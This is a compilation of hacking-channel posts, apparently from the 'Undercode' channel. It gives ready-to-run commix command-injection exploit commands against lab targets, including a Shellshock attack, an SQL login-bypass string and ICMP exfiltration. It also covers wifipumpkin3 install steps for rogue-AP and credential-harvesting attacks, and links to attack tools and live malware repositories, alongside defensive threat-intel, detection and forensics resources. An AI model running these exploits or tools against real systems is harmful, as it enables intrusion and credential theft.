▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automated All-in-One OS command injection and exploitation tool
Termux-Linux
WHY YOU SHOULD USE THIS TOOL ?
used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/commixproject/commix.git

2️⃣cd commix

3️⃣python commix.py -h

4️⃣1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

🦑OS :

-Kali
-Parrot
-debian
-ubuntu
-termux

✅GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Free Port Scanner for Windows
-and How to see who is on your wifi windows ?


Although the title says that Angry IP Scanner is a port scanner for Windows, in fact it is a cross-platform scanner that works great on Linux as well as on Mac. But Linux has Nmap - a powerful network scanner with many options and additional functions for obtaining information about hosts on the network. By the way, Nmap also works on Windows and even has a graphical interface, but many Windows users find it difficult to deal with the command line and numerous Nmap options, and many just don’t need such an abundance of functions (see the article Port Scanner for Windows ).

So, Angry IP Scanner is a simple and intuitive program for finding hosts and scanning ports of computers, sites, servers, phones and any other online devices.

🦑Download : https://angryip.org/download/#windows

#TIPSFORNOOBS
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ENJOY 👍🏻

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UDP VS TCP BY UNDERCODE :

(VPN OPTIONS as example)

The question may arise, why is such an unreliable UDP protocol needed if there is a reliable TCP protocol?


1) The payoff for the reliability of the TCP protocol is what accounting calls “overheads” - the bottom line is that to provide a mechanism for controlling the delivery of packets in the TCP protocol, a lot of data is sent that does not contain useful information, but serves only for installation and connection control.

> For example, to send at least one packet with useful data to TCP, you need to complete a three-stage handshake, which consists in sending 1 special packet from source to destination, receiving 1 packet about the possibility of establishing connections and sending another 1 special packet from the source with confirmation,

2) For this reason, both TCP and UDP are “good” - it is important to use them correctly. For example, when streaming video, it doesn't matter which packet was lost a second or two ago. But when opening a web page, when incomplete data may cause problems with processing the request from the HTTP protocol, on the contrary, you need to monitor the delivery and integrity of each data packet.

🦑A detailed understanding of TCP and UDP matters when:

1️⃣network traffic analysis
2️⃣configure iptables network firewall
3️⃣understanding and protecting against DoS attacks of some kind.

For example, understanding the mechanism of TCP connections, you can configure the iptables so that all new connections will be prohibited while preserving the existing ones, or you can prohibit any incoming connections with full outgoing permission, understand and prevent a number of DoS attacks, understand SYN and other types of scans - why are they possible and what is their mechanism, etc ..

Written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WIFI HACKING -LINUX 2020 :

FEATURES :

Rogue access point attack
Man-in-the-middle attack
Module for deauthentication attack
Module for extra-captiveflask templates
Rogue Dns Server
Captive portal attack (captiveflask)
Intercept, inspect, modify and replay web traffic
WiFi networks scanning
DNS monitoring service
Credentials harvesting
Transparent Proxies
LLMNR, NBT-NS and MDNS poisoner

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7
 
2️⃣$ git clone https://github.com/P0cL4bs/wifipumpkin3.git
 
3️⃣$ cd wifipumpkin3

4️⃣ $ sudo make install

🦑FOR KALI :

1️⃣ $ sudo apt install libssl-dev libffi-dev build-essential

2️⃣ $ git clone https://github.com/P0cL4bs/wifipumpkin3.git
 
3️⃣$ cd wifipumpkin3
now, we need to install the PyQt5, it very easy:

4️⃣sudo apt install python3-pyqt5
or check if the pyqt5 is installed successful:

5️⃣python3 -c "from PyQt5.QtCore import QSettings; print('done')"
now, if you got the message done, nice. the next step is install the wp3:

6️⃣ $ sudo python3 setup.py install

FOR MORE OS INSTALL GO TO https://wifipumpkin3.github.io/docs/getting-started#installation

🦑Tools (pre-installed) :

> iptables (current: iptables v1.6.1)
> iw (current: iw version 4.14)
> net-tools (current: version (1.60+)
> wireless-tools (current: version 30~pre9-12)
> hostapd (current: hostapd v2.6)

7️⃣Once started the tool with sudo wifipumpkin3 , you’ll be presented with an interactive session like the metasploit framework where you can enable or disable modules, plugin, proxy configure the ap and etc

> MORE USAGE : CHECK HERE

✅Git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW PENTEST TUTORIALS & TOOLS :

- [WeebDNS - DNS Enumeration With Asynchronicity](http://feedproxy.google.com/~r/PentestTools/~3/aj8iNTv76KM/weebdns-dns-enumeration-with.html)

- [RedGhost v3.0 - Linux Post Exploitation Framework Written In Bash Designed To Assist Red Teams In Persistence, Reconnaissance, Privilege Escalation And Leaving No Trace](http://feedproxy.google.com/~r/PentestTools/~3/r5pc37rjXcE/redghost-v30-linux-post-exploitation.html)

- [Recon-ng v5.0.0 - Open Source Intelligence Gathering Tool Aimed At Reducing The Time Spent Harvesting Information From Open Sources](http://feedproxy.google.com/~r/PentestTools/~3/aJ03REwtdTs/recon-ng-v500-open-source-intelligence.html)

- [Uncompyle6 - A Cross-Version Python Bytecode Decompiler](http://feedproxy.google.com/~r/PentestTools/~3/4BqkUdipfRA/uncompyle6-cross-version-python.html)

- [OSXCollector - A Forensic Evidence Collection & Analysis Toolkit For OS X](http://feedproxy.google.com/~r/PentestTools/~3/iIrDdkpfB3I/osxcollector-forensic-evidence.html)

- [Vulnado - Purposely Vulnerable Java Application To Help Lead Secure Coding Workshops](http://feedproxy.google.com/~r/PentestTools/~3/3GWRhgE0P_Y/vulnado-purposely-vulnerable-java.html)

- [Orbit v2.0 - Blockchain Transactions Investigation Tool](http://feedproxy.google.com/~r/PentestTools/~3/wMLiz7Gx-5I/orbit-v20-blockchain-transactions.html)

- [Cloudcheck - Checks Using A Test String If A Cloudflare DNS Bypass Is Possible Using CloudFail](http://feedproxy.google.com/~r/PentestTools/~3/DUH7fx0yK74/cloudcheck-checks-using-test-string-if.html)

- [grapheneX - Automated System Hardening Framework](http://feedproxy.google.com/~r/PentestTools/~3/1c8Pd15Q3f0/graphenex-automated-system-hardening.html)

- [O365-Attack-Toolkit - A Toolkit To Attack Office365](http://feedproxy.google.com/~r/PentestTools/~3/5YBArQY7xbI/o365-attack-toolkit-toolkit-to-attack.html)

- [Pyattck - A Python Module To Interact With The Mitre ATT&CK Framework](http://feedproxy.google.com/~r/PentestTools/~3/M1JRpVeqmzc/pyattck-python-module-to-interact-with.html)

- [Evil-Winrm - The Ultimate WinRM Shell For Hacking/Pentesting](http://feedproxy.google.com/~r/PentestTools/~3/vNwEzZybqkk/evil-winrm-ultimate-winrm-shell-for.html)

- [Airopy - Get Clients And Access Points](http://feedproxy.google.com/~r/PentestTools/~3/_2hr62fH7Rc/airopy-get-clients-and-access-points.html)

- [AMIRA - Automated Malware Incident Response & Analysis](http://feedproxy.google.com/~r/PentestTools/~3/n9b89NWONDo/amira-automated-malware-incident.html)

- [VulnWhisperer - Create Actionable Data From Your Vulnerability Scans](http://feedproxy.google.com/~r/PentestTools/~3/F0Myf7GiesM/vulnwhisperer-create-actionable-data.html)

- [Dockernymous - A Script Used To Create A Whonix Like Gateway/Workstation Environment With Docker Containers](http://feedproxy.google.com/~r/PentestTools/~3/WbwiCRF568Y/dockernymous-script-used-to-create.html)

- [HiddenEye - Modern Phishing Tool With Advanced Functionality (Android-Support-Available)](http://feedproxy.google.com/~r/PentestTools/~3/GTRsshv5Lcs/hiddeneye-modern-phishing-tool-with.html)

- [SUDO_KILLER - A Tool To Identify And Exploit Sudo Rules Misconfigurations And Vulnerabilities Within Sudo](http://feedproxy.google.com/~r/PentestTools/~3/grcbPtCQkyg/sudokiller-tool-to-identify-and-exploit.html)

- [Hvazard - Remove Short Passwords & Duplicates, Change Lowercase To Uppercase & Reverse, Combine Wordlists!](http://feedproxy.google.com/~r/PentestTools/~3/V6_EesPs7B0/hvazard-remove-short-passwords.html)

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ iｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 NEW TOP IPHONE SECRET KEYS :

*#06# – Displays IMEI

*3001#12345#* + “Call” – Accesses a hidden Field Test menu

*#43# + “Call” – Displays call waiting status

*43# + “Call” – Enables call waiting

#43# + “Call” – Disables call waiting

*#21# – Displays call forwarding status

##002# + “Call” – Disables all call forwarding

*33*pin# – Enables call barring

#33*pin# – Disables call barring

#31#phone-number + “Call” – Blocks caller ID for the current phone call

*3370# + “Call” – Enables “Enhanced Full Rate” and improves voice quality on GSM networks (may impact battery life)

*#5005*7672# + “Call” – Displays your carrier’s message center phone number

> Here are two notable ones — the first will work on most Android phones and the second will work on all Android phones:

*#*#4636#*#* – Accesses a hidden test menu with sections for network, battery information and usage stats.

(powered by wiki sources)
@iUndercode
▁ ▂ ▄ iｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Follow undercode Testing on :

> Telegram

> instagram

> Facebook

> Pinterest

> Linkedln

> Youtube

> Twitter

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 #Anonymizers

Web traffic anonymizers for analysts.

[Anonymouse.org](http://anonymouse.org/) - A free, web based anonymizer.

OpenVPN - VPN software and hosting solutions.

[Privoxy](http://www.privoxy.org/) - An open source proxy server with some
privacy features.

Tor - The Onion Router, for browsing the web
without leaving traces of the client IP.


✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TOP #Malware

Malware samples collected for analysis.



[Contagio](http://contagiodump.blogspot.com/) - A collection of recent
malware samples and analyses.

Exploit Database - Exploit and shellcode
samples.

[Infosec - CERT-PA](https://infosec.cert-pa.it/analyze/submission.html) - Malware samples collection and analysis.

InQuest Labs - Evergrowing searchable corpus of malicious Microsoft documents.

[Javascript Mallware Collection](https://github.com/HynekPetrak/javascript-malware-collection) - Collection of almost 40.000 javascript malware samples

Malpedia - A resource providing
rapid identification and actionable context for malware investigations.

[Malshare](https://malshare.com) - Large repository of malware actively
scrapped from malicious sites.

Open Malware Project - Sample information and
downloads. Formerly Offensive Computing.

[Ragpicker](https://github.com/robbyFux/Ragpicker) - Plugin based malware
crawler with pre-analysis and reporting functionalities

theZoo - Live malware samples for
analysts.

[Tracker h3x](http://tracker.h3x.eu/) - Agregator for malware corpus tracker
and malicious download sites.

vduddu malware repo - Collection of
various malware files and source code.

[VirusBay](https://beta.virusbay.io/) - Community-Based malware repository and social network.

ViruSign - Malware database that detected by
many anti malware programs except ClamAV.

[VirusShare](https://virusshare.com/) - Malware repository, registration
required.

VX Vault - Active collection of malware samples.

[Zeltser's Sources](https://zeltser.com/malware-sample-sources/) - A list
of malware sample sources put together by Lenny Zeltser.

Zeus Source Code - Source for the Zeus
trojan leaked in 2011.


✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Open Source #Threat Intelligence
#Tools for creating Malwares & resources :

Harvest and analyze IOCs.

[AbuseHelper](https://github.com/abusesa/abusehelper) - An open-source
framework for receiving and redistributing abuse feeds and threat intel.

AlienVault Open Threat Exchange - Share and
collaborate in developing Threat Intelligence.

[Combine](https://github.com/mlsecproject/combine) - Tool to gather Threat
Intelligence indicators from publicly available sources.

Fileintel - Pull intelligence per file hash.

[Hostintel](https://github.com/keithjjones/hostintel) - Pull intelligence per host.

IntelMQ -
A tool for CERTs for processing incident data using a message queue.

[IOC Editor](https://www.fireeye.com/services/freeware/ioc-editor.html) -
A free editor for XML IOC files.

iocextract - Advanced Indicator
of Compromise (IOC) extractor, Python library and command-line tool.

[ioc_writer](https://github.com/mandiant/ioc_writer) - Python library for
working with OpenIOC objects, from Mandiant.

MalPipe - Malware/IOC ingestion and
processing engine, that enriches collected data.

[Massive Octo Spice](https://github.com/csirtgadgets/massive-octo-spice) -
Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs
from various lists. Curated by the
[CSIRT Gadgets Foundation](http://csirtgadgets.org/collective-intelligence-framework).

MISP - Malware Information Sharing
Platform curated by The MISP Project.

[Pulsedive](https://pulsedive.com) - Free, community-driven threat intelligence platform collecting IOCs from open-source feeds.

PyIOCe - A Python OpenIOC editor.

[RiskIQ](https://community.riskiq.com/) - Research, connect, tag and
share IPs and domains. (Was PassiveTotal.)

threataggregator -
Aggregates security threats from a number of sources, including some of

✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Client installation under Windows
#Fast Tip
Let's look at what happens when you install the client on Windows. No matter how hidden the process of installing the server, some initial data will still have to be set, explicitly requesting it from the user or setting some default values.

During the installation process of the InterBase client, you need to specify the directory where InterBase will be installed

> let's call it <InterBase root>. Client installation includes the following steps:

1)Copy files included in the client.

2) Register files for sharing.

3) Create registry keys.

4)Registration of the TCP / IP service.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#MALWARES Threat intelligence and IOC resources.

[Autoshun](https://www.autoshun.org/) ([list](https://www.autoshun.org/files/shunlist.csv)) -
Snort plugin and blocklist.

Bambenek Consulting Feeds -
OSINT feeds based on malicious DGA algorithms.

[Fidelis Barncat](https://www.fidelissecurity.com/resources/fidelis-barncat) -
Extensive malware config database (must request access).

CI Army (list) -
Network security blocklists.

[Critical Stack- Free Intel Market](https://intel.criticalstack.com) - Free
intel aggregator with deduplication featuring 90+ feeds and over 1.2M indicators.

Cybercrime tracker - Multiple botnet active tracker.

[FireEye IOCs](https://github.com/fireeye/iocs) - Indicators of Compromise
shared publicly by FireEye.

FireHOL IP Lists - Analytics for 350+ IP lists
with a focus on attacks, malware and abuse. Evolution, Changes History,
Country Maps, Age of IPs listed, Retention Policy, Overlaps.

[HoneyDB](https://riskdiscovery.com/honeydb) - Community driven honeypot sensor data collection and aggregation.

hpfeeds - Honeypot feed protocol.

[Infosec - CERT-PA lists](https://infosec.cert-pa.it/analyze/statistics.html) ([IPs](https://infosec.cert-pa.it/analyze/listip.txt) - [Domains](https://infosec.cert-pa.it/analyze/listdomains.txt) - [URLs](https://infosec.cert-pa.it/analyze/listurls.txt)) - Blocklist service.

InQuest REPdb - Continuous aggregation of IOCs from a variety of open reputation sources.

[InQuest IOCdb](https://labs.inquest.net/iocdb) - Continuous aggregation of IOCs from a variety of blogs, Github repos, and Twitter.

Internet Storm Center (DShield) - Diary and
searchable incident database, with a web API.
(unofficial Python library).

[malc0de](http://malc0de.com/database/) - Searchable incident database.

Malware Domain List - Search and share
malicious URLs.

[MetaDefender Threat Intelligence Feed](https://www.opswat.com/developers/threat-intelligence-feed) -
List of the most looked up file hashes from MetaDefender Cloud.

OpenIOC -
Framework for sharing threat intelligence.

[Proofpoint Threat Intelligence](https://www.proofpoint.com/us/products/et-intelligence) -
Rulesets and more. (Formerly Emerging Threats.)

Ransomware overview

✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A list of ransomware overview with details, detection and prevention !!

[STIX - Structured Threat Information eXpression](http://stixproject.github.io)
Standardized language to represent and share cyber threat information.
Related efforts from [MITRE](https://www.mitre.org/):

- [CAPEC - Common Attack Pattern Enumeration and Classification](http://capec.mitre.org/)

- [CybOX - Cyber Observables eXpression](http://cyboxproject.github.io)

- [MAEC - Malware Attribute Enumeration and Characterization](http://maec.mitre.org/)

- [TAXII - Trusted Automated eXchange of Indicator Information](http://taxiiproject.github.io)

SystemLookup - SystemLookup hosts a collection of lists that provide information on
the components of legitimate and potentially unwanted programs.

[ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat
intelligence, with search.

threatRECON - Search for indicators, up to 1000
free per month.

[Yara rules](https://github.com/Yara-Rules/rules) - Yara rules repository.


ZeuS Tracker - ZeuS
blocklists.

✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Detection and Classification
#MALWARES 2020

Antivirus and other malware identification tools

[AnalyzePE](https://github.com/hiddenillusion/AnalyzePE) - Wrapper for a
variety of tools for reporting on Windows PE files.

Assemblyline - A scalable
distributed file analysis framework.

[BinaryAlert](https://github.com/airbnb/binaryalert) - An open source, serverless
AWS pipeline that scans and alerts on uploaded files based on a set of
YARA rules.

chkrootkit - Local Linux rootkit detection.

[ClamAV](http://www.clamav.net/) - Open source antivirus engine.

Detect It Easy(DiE) - A
program for
determining types of files.

[Exeinfo PE](http://exeinfo.pe.hu/) - Packer, compressor detector, unpack
info, internal exe tools.

ExifTool - Read, write and
edit file metadata.

[File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.

Generic File Parser - A Single Library Parser to extract meta information,static analysis and detect macros within the files.

[hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.

HashCheck - Windows shell extension
to compute hashes with a variety of algorithms.

[Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.

Malfunction - Catalog and
compare malware at a function level.

[Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.

MASTIFF - Static analysis
framework.

[MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework

Nauz File Detector(NFD) - Linker/Compiler/Tool detector for Windows, Linux and MacOS.

[nsrllookup](https://github.com/rjhansen/nsrllookup) - A tool for looking
up hashes in NIST's National Software Reference Library database.

packerid - A cross-platform
Python alternative to PEiD.

[PE-bear](https://hshrzd.wordpress.com/pe-bear/) - Reversing tool for PE
files.

PEframe - PEframe is an open source tool to perform static analysis on Portable Executable malware and malicious MS Office documents.

[PEV](http://pev.sourceforge.net/) - A multiplatform toolkit to work with PE
files, providing feature-rich tools for proper analysis of suspicious binaries.

PortEx - Java library to analyse PE files with a special focus on malware analysis and PE malformation robustness.

[Quark-Engine](https://github.com/quark-engine/quark-engine) - An Obfuscation-Neglect Android Malware Scoring System

Rootkit Hunter - Detect Linux rootkits.

[ssdeep](https://ssdeep-project.github.io/ssdeep/) - Compute fuzzy hashes.

totalhash.py -
Python script for easy searching of the TotalHash.cymru.com
database.

ENJOY ❤️👍🏻
✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Online #Scanners and #Sandboxes topic

Web-based multi-AV scanners, and malware sandboxes for automated analysis.

[anlyz.io](https://sandbox.anlyz.io/) - Online sandbox.

any.run - Online interactive sandbox.

[AndroTotal](https://andrototal.org/) - Free online analysis of APKs
against multiple mobile antivirus apps.

AVCaesar - Malware.lu online scanner and
malware repository.

[BoomBox](https://github.com/nbeede/BoomBox) - Automatic deployment of Cuckoo
Sandbox malware lab using Packer and Vagrant.

Cryptam - Analyze suspicious office documents.

[Cuckoo Sandbox](https://cuckoosandbox.org/) - Open source, self hosted
sandbox and automated analysis system.

cuckoo-modified - Modified
version of Cuckoo Sandbox released under the GPL. Not merged upstream due to
legal concerns by the author.

[cuckoo-modified-api](https://github.com/keithjjones/cuckoo-modified-api) - A
Python API used to control a cuckoo-modified sandbox.

DeepViz - Multi-format file analyzer with
machine-learning classification.

[detux](https://github.com/detuxsandbox/detux/) - A sandbox developed to do
traffic analysis of Linux malwares and capturing IOCs.

DRAKVUF - Dynamic malware analysis

ENJOY ❤️👍🏻
✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Domain Analysis Topic resources 2020

Inspect domains and IP addresses.


[AbuseIPDB](https://www.abuseipdb.com/) - AbuseIPDB is a project dedicated to helping combat the spread of hackers, spammers, and abusive activity on the internet.

badips.com - Community based IP blacklist service.

[boomerang](https://github.com/EmersonElectricCo/boomerang) - A tool designed for consistent and safe capture of off network web resources.

Cymon - Threat intelligence tracker, with IP/domain/hash search.

[Desenmascara.me](http://desenmascara.me) - One click tool to retrieve as much metadata as possible for a website and to assess its good standing.

Dig - Free online dig and other
network tools.

[dnstwist](https://github.com/elceef/dnstwist) - Domain name permutation
engine for detecting typo squatting, phishing and corporate espionage.

IPinfo - Gather information
about an IP or domain by searching online resources.


[mailchecker](https://github.com/FGRibreau/mailchecker) - Cross-language
temporary email detection library.

MaltegoVT - Maltego transform
for the VirusTotal API. Allows domain/IP research, and searching for file
hashes and scan reports.

[Multi rbl](http://multirbl.valli.org/) - Multiple DNS blacklist and forward
confirmed reverse DNS lookup over more than 300 RBLs.

NormShield Services - Free API Services
for detecting possible phishing domains, blacklisted ip addresses and breached
accounts.

[PhishStats](https://phishstats.info/) - Phishing Statistics with search for
IP, domain and website title

Spyse - subdomains, whois, realted domains, DNS, hosts AS, SSL/TLS info,

[SecurityTrails](https://securitytrails.com/) - Historical and current WHOIS,
historical and current DNS records, similar domains, certificate information
and other domain and IP related API and tools.

SpamCop - IP based spam block list.

[SpamHaus](https://www.spamhaus.org/lookup/) - Block list based on
domains and IPs.

Sucuri SiteCheck - Free Website Malware
and Security Scanner.

ENJOY ❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑File #Carving #Mlawares

 extracting files from inside disk and memory images.

[bulk_extractor](https://github.com/simsong/bulk_extractor) - Fast file
carving tool.

EVTXtract - Carve Windows
Event Log files from raw binary data.

[Foremost](http://foremost.sourceforge.net/) - File carving tool designed
by the US Air Force.

hachoir3 - Hachoir is a Python library
to view and edit a binary stream field by field.

[Scalpel](https://github.com/sleuthkit/scalpel) - Another data carving
tool.

SFlock - Nested archive
extraction/unpacking (used in Cuckoo Sandbox).

ENJOY ❤️👍🏻
✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHEN SANDBOX BECOME A MALWARE ?
#FastTip

Nearly every malware analysis sandbox looks at the system call interface or the Windows API when monitoring the behavior of a user mode process. ...

> In other words, a sandbox may see a malware read from a script, but it can not tell how the malware actually handles the data.

@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Essential malware analysis reading material #resources
#Malware/

[Learning Malware Analysis](https://www.packtpub.com/networking-and-servers/learning-malware-analysis) - Learning Malware Analysis: Explore the concepts, tools, and techniques to analuze and investigate Windows malware

Mastering Malware Analysis - Mastering Malware Analysis: The complete malware analyst's guide to combating malicious software, APT, cybercime, and IoT attacks

[Mastering Reverse Engineering](https://www.packtpub.com/networking-and-servers/mastering-reverse-engineering) - Mastering Reverse Engineering: Re-engineer your ethical hacking skills

Practical Malware Analysis - The Hands-On
Guide to Dissecting Malicious Software.

[Practical Reverse Engineering](https://www.amzn.com/dp/1118787315/) -
Intermediate Reverse Engineering.

Real Digital Forensics - Computer
Security and Incident Response.

[Rootkits and Bootkits](https://www.amazon.com/dp/1593277164) - Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats

The Art of Memory Forensics - Detecting
Malware and Threats in Windows, Linux, and Mac Memory.

[The IDA Pro Book](https://amzn.com/dp/1593272898) - The Unofficial Guide
to the World's Most Popular Disassembler.

The Rootkit Arsenal - The Rootkit Arsenal:
Escape and Evasion in the Dark Corners of the System




ENJOY ❤️👍🏻
✅2020 GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
